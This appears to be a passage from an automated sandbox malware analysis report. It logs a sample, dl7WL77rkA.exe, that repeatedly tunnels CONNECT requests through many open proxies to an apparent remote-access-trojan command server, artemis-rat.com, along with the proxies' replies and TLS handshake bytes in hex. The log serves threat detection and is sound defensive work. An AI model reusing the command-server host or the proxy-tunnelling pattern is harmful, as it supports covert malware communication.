                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 6d 6c 3b 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 20 2f 3e 0a 20 20 20 3c 73 74 79 6c 65 3e 62 6f 64 79 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 63 6f 6c 6f 72 3a 23 46 46 46 46 46 46 7d 3c 2f 73 74 79 6c 65 3e 20 0a 3c 74 69 74 6c 65 3e 4e 6f 6e 2d 63 6f 6d 70 6c 69 61 6e 63 65 20 49 43 50 20 46 69 6c 69 6e 67 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 63 72 69 70 74 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 3e 0a 20 20 20 20 20 20 20 20 20 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 20 3d 20 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 20 0a 20 20 20 20 20 20 20 20 20 20 20 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 6d 61 69 6e 46 72 61 6d 65 22 29 2e 73 72 63 3d 20 22 68 74 74 70 3a 2f 2f 62 61 74 69 74 2e 61 6c 69 79 75 6e 2e 63 6f 6d 2f 61 6c 77 77 2e 68 74 6d 6c 3f 69 64 3d 30 30 30 30 30 30 30 30 30 30 33 38 38 37 38 32 32 38 39 34 22 3b 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 3c 2f 73 63 72 69 70 74 3e 20 20 20 0a 3c 2f 68 65 61 64 3e 0a 20 20 3c 62 6f 64 79 3e 0a 20 20 20 20 3c 69 66 72 61 6d 65 20 73 74 79 6c 65 3d 22 77 69 64 74 68 3a 38 36 30 70 78 3b 20 68 65 69 67 68 74 3a 35 30 30 70 78 3b 70 6f 73 69 74 69 6f 6e 3a 61 62 73 6f 6c 75 74 65 3b 6d 61 72 67 69 6e 2d 6c 65 66 74 3a 2d 34 33 30 70 78 3b 6d 61 72 67 69 6e 2d 74 6f 70 3a 2d 32 35 30 70 78 3b 74 6f 70 3a 35 30 25 3b 6c 65 66 74 3a 35 30 25 3b 22 20 69 64 3d 22 6d 61 69 6e 46 72 61 6d 65 22 20 73 72 63 3d 22 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 6e 6f 22 3e 3c 2f 69 66 72 61 6d 65 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 20 20 20 20 20 20 3c 2f 68 74 6d 6c 3e 0a 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><meta http-equiv="Content-Type" content="textml;charset=UTF-8" /> <style>body{background-color:#FFFFFF}</style> <title>Non-compliance ICP Filing</title> <script language="javascript" type="text/javascript"> window.onload = function () { document.getElementById("mainFrame").src= "http://batit.aliyun.com/alww.html?id=00000000003887822894"; }</script> </head> <body> <iframe style="width:860px; height:500px;position:absolute;margin-left:-430px;margin-top:-250px;top:50%;left:50%;" id="mainFrame" src="" frameborder="0" scrolling="no"></iframe> </body> </html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            243192.168.2.550452103.19.59.10219833876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.596142054 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.286115885 CET19INHTTP/1.1 200 OK


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            244192.168.2.550493219.243.212.11810803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.597708941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            245192.168.2.550584162.223.94.164803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.600748062 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.883981943 CET316INHTTP/1.1 400 Bad Request
                                                                                                                                                                                                                                                            Server: cloudflare
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 155
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            CF-RAY: -
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            246192.168.2.550500213.131.230.16131283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.625210047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.940274954 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            247192.168.2.55049445.11.95.16660093876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.625210047 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            248192.168.2.550512185.104.219.229803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.625358105 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.936438084 CET401INHTTP/1.0 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm="login"
                                                                                                                                                                                                                                                            Connection: close
                                                                                                                                                                                                                                                            Content-type: text/html; charset=utf-8
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 34 30 37 20 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64 3c 2f 68 32 3e 3c 68 33 3e 41 63 63 65 73 73 20 74 6f 20 72 65 71 75 65 73 74 65 64 20 72 65 73 6f 75 72 63 65 20 64 69 73 61 6c 6c 6f 77 65 64 20 62 79 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 6f 72 20 79 6f 75 20 6e 65 65 64 20 76 61 6c 69 64 20 75 73 65 72 6e 61 6d 65 2f 70 61 73 73 77 6f 72 64 20 74 6f 20 75 73 65 20 74 68 69 73 20 72 65 73 6f 75 72 63 65 3c 2f 68 33 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>407 Proxy Authentication Required</title></head><body><h2>407 Proxy Authentication Required</h2><h3>Access to requested resource disallowed by administrator or you need valid username/password to use this resource</h3></body></html>


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            249192.168.2.55055062.112.10.2680803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.625909090 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.264228106 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.139267921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.905358076 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.389985085 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.889795065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            250192.168.2.55062038.162.3.21531283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.625915051 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.039921045 CET111INHTTP/1.1 407 Proxy Authentication Required
                                                                                                                                                                                                                                                            Proxy-Authenticate: Basic realm=""
                                                                                                                                                                                                                                                            Data Raw: 50 72 6f 78 79 20 41 75 74 68 65 6e 74 69 63 61 74 69 6f 6e 20 52 65 71 75 69 72 65 64
                                                                                                                                                                                                                                                            Data Ascii: Proxy Authentication Required


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            251192.168.2.550521161.97.104.480803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.626085043 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.942673922 CET82INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Content-Length: 0


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            252192.168.2.55051418.135.133.116803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.626091957 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.918256998 CET116INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                            Date: Mon, 11 Mar 2024 02:30:38 GMT
                                                                                                                                                                                                                                                            Server: nginx
                                                                                                                                                                                                                                                            Content-Type: text/plain
                                                                                                                                                                                                                                                            Content-Length: 0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.919624090 CET177OUTData Raw: 16 03 03 00 ac 01 00 00 a8 03 03 65 ee 6c cd 20 16 57 00 f7 e2 1b f1 bc a7 21 40 72 1d c1 4c db 5d 86 0f a1 15 0e 81 d7 bb 7d b5 00 00 2a c0 2c c0 2b c0 30 c0 2f 00 9f 00 9e c0 24 c0 23 c0 28 c0 27 c0 0a c0 09 c0 14 c0 13 00 9d 00 9c 00 3d 00 3c
                                                                                                                                                                                                                                                            Data Ascii: el W!@rL]}*,+0/$#('=<5/Uartemis-rat.com#
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.244188070 CET1079INData Raw: 16 03 03 00 3d 02 00 00 39 03 03 d3 94 2e 29 ca d8 3e 69 29 9f b1 2b 1a 41 ae d3 93 d9 98 8f fd 0c f2 4f 44 4f 57 4e 47 52 44 01 00 c0 30 00 00 11 ff 01 00 01 00 00 0b 00 04 03 00 01 02 00 17 00 00 16 03 03 02 b6 0b 00 02 b2 00 02 af 00 02 ac 30
                                                                                                                                                                                                                                                            Data Ascii: =9.)>i)+AODOWNGRD0000*H010Uartemis-rat.com0240311022309Z260311022309Z010Uartemis-rat.com0"0*H0eOvn0
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.245928049 CET93OUTData Raw: 16 03 03 00 25 10 00 00 21 20 38 62 e3 73 73 f2 20 2c b0 8d 68 78 30 a8 1f b0 b0 ba fd bd 17 2d 16 ed 4d 36 9e f2 46 0b a0 3d 14 03 03 00 01 01 16 03 03 00 28 00 00 00 00 00 00 00 00 27 b5 cd 55 e3 84 9f f0 ec 2f 41 4d d4 e3 61 6e 12 c9 6a 96 96
                                                                                                                                                                                                                                                            Data Ascii: %! 8bss ,hx0-M6F=('U/AManj\78Zh
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.594166994 CET51INData Raw: 14 03 03 00 01 01 16 03 03 00 28 2b 28 ba 3e d3 ec cf 27 74 97 aa 9e 31 bb 1d a2 a7 8d cb a3 e0 e7 6c 43 27 8d 7a f7 98 08 c7 14 4a 92 91 95 60 c1 21 fc
                                                                                                                                                                                                                                                            Data Ascii: (+(>'t1lC'zJ`!


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            253192.168.2.549896184.178.172.28152943876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.629401922 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            254192.168.2.55052451.158.98.211163793876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.629578114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:39.264200926 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:40.139267921 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:41.905288935 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:45.389942884 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:48.889780998 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:52.389583111 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:54.048403978 CET536INHTTP/1.0 501 Tor is not an HTTP Proxy
                                                                                                                                                                                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                                                                                                                                                                                            Data Raw: 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 53 20 50 72 6f 78 79 2c 20 4e 6f 74 20 41 6e 20 48 54 54 50 20 50 72 6f 78 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 68 31 3e 54 68 69 73 20 69 73 20 61 20 53 4f 43 4b 73 20 70 72 6f 78 79 2c 20 6e 6f 74 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 3c 2f 68 31 3e 0a 3c 70 3e 0a 49 74 20 61 70 70 65 61 72 73 20 79 6f 75 20 68 61 76 65 20 63 6f 6e 66 69 67 75 72 65 64 20 79 6f 75 72 20 77 65 62 20 62 72 6f 77 73 65 72 20 74 6f 20 75 73 65 20 74 68 69 73 20 54 6f 72 20 70 6f 72 74 20 61 73 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 0a 3c 2f 70 3e 3c 70 3e 0a 54 68 69 73 20 69 73 20 6e 6f 74 20 63 6f 72 72 65 63 74 3a 20 54 68 69 73 20 70 6f 72 74 20 69 73 20 63 6f 6e 66 69 67 75 72 65 64 20 61 73 20 61 20 53 4f 43 4b 53 20 70 72 6f 78 79 2c 20 6e 6f 74 0a 61 6e 20 48 54 54 50 20 70 72 6f 78 79 2e 20 49 66 20 79 6f 75 20 6e 65 65 64 20 61 6e 20 48 54 54 50 20 70 72 6f 78 79 20 74 75 6e 6e 65 6c 2c 20 75 73 65 20 74 68 65 20 48 54 54 50 54 75 6e 6e 65 6c 50 6f 72 74 0a 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 6f 70 74 69 6f 6e 20 69 6e 20 70 6c 61 63 65 20 6f 66 2c 20 6f 72 20 69 6e 20 61 64 64 69 74 69 6f 6e 20 74 6f 2c 20 53 4f 43 4b 53 50 6f 72 74 2e 0a 50 6c 65 61 73 65 20 63 6f 6e 66 69
                                                                                                                                                                                                                                                            Data Ascii: <html><head><title>This is a SOCKS Proxy, Not An HTTP Proxy</title></head><body><h1>This is a SOCKs proxy, not an HTTP proxy.</h1><p>It appears you have configured your web browser to use this Tor port asan HTTP proxy.</p><p>This is not correct: This port is configured as a SOCKS proxy, notan HTTP proxy. If you need an HTTP proxy tunnel, use the HTTPTunnelPortconfiguration option in place of, or in addition to, SOCKSPort.Please confi


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            255192.168.2.550651165.232.158.6031283876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.631131887 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.805058002 CET39INHTTP/1.1 200 Connection established


                                                                                                                                                                                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                            256192.168.2.550489120.26.0.1188803876C:\Users\user\Desktop\dl7WL77rkA.exe
                                                                                                                                                                                                                                                            TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.631155968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                                                                                                                                                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                                                                                                                                                                                            Host: artemis-rat.com
                                                                                                                                                                                                                                                            Proxy-Connection: Keep-Alive
                                                                                                                                                                                                                                                            Mar 11, 2024 03:30:38.968003035 CET767INHTTP/1.1 403 Forbidden
                                                                                                                                                                                                                                                            Server: Beaver
                                                                                                                                                                                                                                                            Cache-Control: no-cache
                                                                                                                                                                                                                                                            Content-Type: text/html
                                                                                                                                                                                                                                                            Content-Length: 635
                                                                                                                                                                                                                                                            Connection: close
